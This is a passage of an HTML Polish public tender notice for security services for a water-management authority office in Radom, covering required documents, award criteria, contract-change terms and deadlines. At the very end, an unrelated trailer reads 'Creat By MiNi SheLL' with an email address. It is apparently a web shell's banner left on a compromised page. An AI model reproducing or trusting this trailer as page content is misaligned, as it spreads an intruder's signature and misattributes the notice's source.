<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Czas dojazdu patrolu interwencyjnego do posterunku nr II - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Niedopuszczalna jest, pod rygorem nieważności, istotna zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia zmian wynika z okoliczności, o których mowa w ust. 2 niniejszego paragrafu.<br/>
2.	Strony mogą zmienić postanowienia zawartej umowy jeżeli zaistniały okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z tym wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę, a w szczególności zmiany mogą dotyczyć: <br/>
- terminu realizacji umowy,<br/>
- zakresu umowy,<br/>
- wartości umowy.<br/>
3.	Zamawiający zastrzega sobie możliwość zmiany lub rezygnacji z części zakresu umowy:<br/>
- w przypadku zmian organizacyjnych lub administracyjnych w jednostce Zamawiającego stosownie do wysokości posiadanych środków,<br/>
- w przypadku nałożenia na Zamawiającego w drodze postanowienia lub decyzji zmiany rodzaju ochrony (np. podwyższenie zabezpieczenia na którymś z obiektów), co wiązałoby się ze znacznym wzrostem kosztów, wprowadzeniem osób z uzbrojeniem itp,<br/>
- w przypadku nieotrzymania przez Zamawiającego środków finansowych, koniecznych do realizacji niniejszej umowy,<br/>
- w przypadku zmian w nazwach lub adresach stron,<br/>
- w przypadku sposobu wykonania usługi w zakresie szczegółowych rozwiązań, o ile będą one prowadzić do zastosowania rozwiązań, co najmniej równoważnych lub korzystniejszych pod względem funkcjonalnym dla Zamawiającego,<br/>
- w przypadku jednostronnego zmniejszenia/zwiększenia zakresu zamówienia i zmniejszenia/zwiększenia wynagrodzenia proporcjonalnie do zmniejszenia/zwiększenia zakresu obowiązków, <br/>
- gdy wystąpią okoliczności, których nie można było przewidzieć w chwili podpisywania umowy. <br/>
4.	W przypadku zmian, o których mowa w ust. 3 rozliczenie z Wykonawcą nastąpi na podstawie stawek zaproponowanych w kalkulacji ceny oferty</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> wzmiuw.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu ul. Wernera 4a 26-600 Radom - pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2015 godzina 10:00, miejsce: Sekretariat Wojewódzkiego Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu ul. Wernera 4a 26-600 Radom - pokój nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com